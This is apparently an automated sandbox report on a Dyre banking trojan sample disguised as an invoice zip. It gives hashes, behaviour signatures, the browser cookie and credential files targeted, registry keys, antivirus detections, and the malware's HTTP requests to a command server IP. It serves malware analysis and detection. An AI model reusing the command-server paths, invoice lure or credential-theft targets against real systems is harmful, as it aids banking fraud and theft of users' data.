Flattr this analysis!

Tags: Dyre Dyreza

Analysis

Category Started Completed Duration
FILE 2014-06-11 05:06:44 2014-06-11 05:09:03 139 seconds

File Details

File Name Invoice_00739287.zip
File Size 162486 bytes
File Type Zip archive data, at least v2.0 to extract
MD5 dda44f23e9650fe42dd5cf9893a434a2
SHA1 88a4ad78db87d0f62cc4ca7b6ba24bd194fa943b
SHA256 417c9cd7c8abbd7bbddfc313c9f153758fd11bda47f754b9c59bc308d808c486
SHA512 b6a0a9db2c147e2b05b02251d9125f90b40febd6a0a00906769b2bc10ba42111731bcd6abf7a02e92bfb6821910e03b00e9e45ebe14af64a340945d3166b2866
CRC32 DCADC4D6
Ssdeep 3072:u6WDAD7hhNAfyjfjCTdAzQ+AWCG6b2NIEg3UcKFwyEsX9Kk3wZ:yq7/NAfyDj4m0WObVYP9KkAZ
Yara None matched
You need to login

Signatures

File has been identified by at least one AntiVirus on VirusTotal as malicious
Performs some HTTP requests
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate)
Steals private information from local Internet browsers
process_id: 1412
process_name: Explorer.EXE
file: C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Local State
Installs itself for autorun at Windows startup

Screenshots


Hosts

IP
217.12.207.151
192.99.6.61
23.253.218.205

Domains

Domain IP
icanhazip.com 23.253.218.205

Summary

C:\WINDOWS\Invoice_00739287.INI
C:\WINDOWS\system32\msctfime.ime
C:\WINDOWS\googleupdaterr.INI
C:\DOCUME~1\User\LOCALS~1\Temp\Invoice_00739287.scr
PIPE\lsarpc
C:\Documents and Settings\User\Application Data\userdata.dat
C:\Documents and Settings\User\Cookies\*.txt
C:\Documents and Settings\User\Cookies\Low\*.txt
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Local State
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\profiles.ini
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default\cookies.sqlite
C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
C:\WINDOWS\system32\Ras\*.pbk
c:\autoexec.bat
C:\Documents and Settings
C:\Documents and Settings\User\Local Settings
C:\Documents and Settings\User\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
C:\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\IMM
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_CURRENT_USER\SOFTWARE\Microsoft\CTF
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\SystemShared
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Control Panel\Desktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\SOFTWARE\Microsoft\Cryptography\Providers\Type 001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Strong Cryptographic Provider
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Offload
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_AUTOPROXY_CACHE_ANAME_KB921400
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TEMPORARYFILES_FOR_NOCACHE_840387
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TEMPORARYFILES_FOR_NOCACHE_840386
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CHUNK_TIMEOUT_KB914453
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CERT_TRUST_VERIFIED_KB936882
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENSURE_FQDN_FOR_NEGOTIATE_KB899417
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_DISABLE_NTLM_PREAUTH_IF_ABORTED_KB902409
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WPAD_STORE_URL_AS_FQDN_KB903926
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_KEEP_CACHE_INDEX_OPEN_KB899342
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WAIT_TIME_THREAD_TERMINATE_KB886801
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\RASAPI32
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName
ActiveComputerName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Environment
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Volatile Environment
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings
CTF.TimListCache.FMPDefaultS-1-5-21-1547161642-507921405-839522115-1004MUTEX.DefaultS-1-5-21-1547161642-507921405-839522115-1004
ShimCacheMutex
RangisMutex5
WininetStartupMutex
WininetConnectionMutex
WininetProxyRegistryMutex
OOPS! No static analysis available, probably it's not a supported file format.
Invoice_00739287.scr
.,*3C+
omDW%-|
6:_+|
y&}lm~
:FKCzK}
<[5_Jo
902DMz
~`L"<]Q
O `x>W
IfUH_E
7yE6[*
[9n:h{"
0W-G'u
=F6K_-
Yb)y=9?P
4Yq<Pk6:Z?
]Y1B\P
TGigz%
e|_/EV
3O.BOjC
InuGS*
3&vlZ4
^$Zg3A)
UeU_|a
viKxqE
xK!m8
`qwo_o
U:<4@7
qDqQWD
'CHay
+VE[61
Xy/T8\
]{fGy1
.WxNCz
Y1Bp~!8
sFY5iB
nbhj)}
F?<xskE
%u]&Z'
qias,c
GeR/PSBw
mfU,9|e
h~>r|M
n/L2n%
~T" i+
~^Gl"c
a`qw?n
L>hNQo&
R<yWQ
00:6LXx
G9H.^=[
5cgdG3
],AB~({
&*KeGz=t
;`?A/lf
hz]wjMf
<Sz(9h
XGuMpC
{K1bG/-
m1: `n
C'ZRqs
mCOR+bY
005Vmg
aH+qeh
|'u.t.
)-,!McZ
F-%t#a
B(+`MV
F68O&~
o)<V;3
Righ1(
@wQEx<T
>Z``Zq
D1]Iv
XTmnZH:
\=OZl+Y
@Ak{L*
61GAP^u
o}nL{(
42th(jee
w)L]9.
eMWgs*
eG'^l6
hxl1y>O
p!4N\i
Fd(&i;
v&-hPy
u>th-,
id=xo8
8U+BMbH
{igoNF=
Gi%uyz
<`?_\dY
v"Qo`:u
[[I_tB`IO
oy&y1<j
p}%hac
{79.f5
o9N,g
Cfh_%q
40kt`r
PMD{;[
p8RJP0
/uGkD=
SP9XZn|
q]I)jF
.:5y:8
~ER|-e
m\"eKR
=1=6gD
P+%=Vx
0Mo!x0v
Ut8@CNa
crK\(Fy
V\BG9=G?
D!b<ot
ddr=;3
d>s+x$
fnM\*c
)L?g92"
^(T!@0
{+*Rc|
Y5y,jQ
vE}..A
e}x>(g7S
G!t%.z
PH7Vh2
u~Z4B%
[1SRwD
h?s?D%
6L'$=[
#R'KAN
)[Q:E/Pz
#}\Sx|\{YC
=\jAeU
qSY2qL
!K/|HA
:2~cl[+,
{j|dhNe
WoU M(
$#rf|<
PekdK4
J^JBkc
+fbke_{
$YwZSY
^A>,B7#
oEXA=,K
/w>!?D
Cm5PP
$bWgtc
*SAitVja
.Ep5y+d
a;E__gJ%
UUB.7JJ
wd>p:mT:
8?$)6jc
:MGD"N
hVk;X#
:+N4zjy
id7[_8
n8[Q2hU
jVslH^}
YZS?a%q
NB9~uD#
t5>r8
a2Mc)c
C >;pf=I
eB7ukhr
0P)cIv
JmZ}'@pq
-s_|?3
MHwEUW
JO]H<
'Safo.
ro%h<7
W^M0[Gj;_
hCoipU
[m:\yi
F`oB:5M
PF|tZS
1SLW,k
s*q5+CF#
T3-KZ*
'-,GxH
&=>E`3
5m/,>c
mq<L1n
payl58
k*T}R!
t}i6%VQ
/A5><!
(`r )G
V~(~/{
Bb*a|+
&qdA{X
k\q"::
U5c"B\g
}mh9;!
Q-b>]d{
G[Lm$G
:1gQJ^
'2s$Y,
}[<CA1,
8c_"4n
pssP]D
"6m-JK
c12m3~
s/h!h<D
(Yhc7a
lUlK.W?y\
H%Wa^V
`>ke4Z_d
Z[b$mBt
@+l;4y,
7<NZSn
8{YT8T
G5+,/m
F7un2n
5'H`Ms-
Vs_Iq3pt
aQ_K9W
~gfwY`aWd
A_q'eU
?dUM<O d
EbguBb
p#2T]t
3hlm-_
Fo+U2';
lf[l$b
b}8J?c
%^h#o7G
iW>42R
sjXkWQl
Txe3tR
-?vp]Sq
4>4|P|$
G'm|}
B~L6(1
kEw65_~
#c}o=:
h(0*uH
D9I,7=
K^a1"
lf4*1=
%k'we3b
Fs[iJs
%5FurI
TpK'Nofqr
D0xdN,
)?Nw]@Q
VOW#XN?
]u@eu7
aom4b
>U-v<f*
%0+=iFZ
8Alq8W
I&`82i
8U$Qq$
R#Hd0q
hWmk0/G6
1h2qZ,
\}imM{
<Yb#y?
0~6V'1
HKUuz0
Xaa!VVV
Z[ObmmmX{;
$0oW]j(
+X/K,J+
&EWQ
\%BaVU
$1V0I6"
R%m| W
seL@JLt
20]l5
r6KRj~
fvMC)]p
}9PvG8
_Y~G0Y
i@gG97
Invoice_00739287.scr
Antivirus Signature
Bkav Clean
MicroWorld-eScan Clean
nProtect Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
SUPERAntiSpyware Clean
K7AntiVirus Trojan ( 7000000c1 )
K7GW Trojan ( 7000000c1 )
TheHacker Clean
NANO-Antivirus Clean
F-Prot Clean
Symantec Clean
Norman Clean
TotalDefense Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Clean
Agnitum Clean
AegisLab Clean
ByteHero Clean
Tencent Clean
Ad-Aware Clean
Sophos Troj/Invo-Zip
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
AntiVir Clean
TrendMicro Clean
McAfee-GW-Edition Clean
Emsisoft Clean
Jiangmin Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
ViRobot Clean
GData Clean
Commtouch Clean
AhnLab-V3 Clean
VBA32 Clean
Baidu-International Clean
Zoner Clean
ESET-NOD32 Clean
Rising PE:Malware.XPACK-HIE/Heur!1.9C48
Ikarus Clean
Fortinet Clean
AVG Clean
Panda Clean
Qihoo-360 Malware.QVM07.Gen

  • Invoice_00739287.scr 1224
    • googleupdaterr.exe 1168
  • Explorer.EXE 1412
Invoice_00739287.scr, PID: 1224, Parent PID: 1276

network filesystem registry process services synchronization

googleupdaterr.exe, PID: 1168, Parent PID: 1224

network filesystem registry process services synchronization

Explorer.EXE, PID: 1412, Parent PID: 1380

network filesystem registry process services synchronization

Domains

Domain IP
icanhazip.com 23.253.218.205

Hosts

IP
217.12.207.151
192.99.6.61
23.253.218.205

HTTP Requests

URI Data
http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/5/publickey/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/5/publickey/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

http://icanhazip.com/
GET / HTTP/1.1
Host: icanhazip.com

http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/0/Win_XP_32bit/1001/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/0/Win_XP_32bit/1001/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/LeXqIraYMSXwIhSVoAPxEHMnIMwJmfc/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/LeXqIraYMSXwIhSVoAPxEHMnIMwJmfc/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/58/1/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/58/1/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/syiJyderChOFcGVcKOviWXMtmQxthdt/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/syiJyderChOFcGVcKOviWXMtmQxthdt/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/GNAuFRKLbmTAeuuylUmSwbchuJyeReO/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/GNAuFRKLbmTAeuuylUmSwbchuJyeReO/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/tMmbVlMMKfCFiPPmlvsoFBNKsVuqQhB/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/tMmbVlMMKfCFiPPmlvsoFBNKsVuqQhB/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

IRC Traffic

No IRC traffic.

SMTP Requests

No SMTP requests performed.

File name Invoice_00739287.scr
File Size 246784 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 c2d73485095efdbd7ab625e469affb11
SHA1 a0a7b943b46979cc593474b94f14f2451b8ac3c0
SHA256 523b9e8057ef0905e2c7d51b742d4be9374cf2eee5a810f05d987604847c549d
CRC32 02228702
Ssdeep 6144:/GpBEWJvXcs5eyOfevIUdy/ZV6u2nf0+8aq:/GkEEJy3IUdy/ZVrifqaq
Yara None matched
File name userdata.dat
File Size 338 bytes
File Type Hitachi SH big-endian COFF object, not stripped
MD5 1ead2fca645ca0d5bb95b81fcc019ae0
SHA1 4d7594e65617d71eea8c2ae97bb0e635015fa768
SHA256 73e2469f5c4cf5400afb55f67570c09b65bc8f2896eff17988dd3501166d2709
CRC32 AB6E1778
Ssdeep 6:fpAQaLwe/MLF/eG6adqOdE08H6YmdL041GmvLj1kPxf4eC7gkyrdhum0NJ:veSlldE08HzY3DjuTC7g/dUm0L
Yara None matched
Analysis : http://phishme.com/project-dyre-new-rat-slurps-bank-credentials-bypasses-ssl/ – ansoc on July 2, 2014, 6:50 a.m.

You have to login to comment.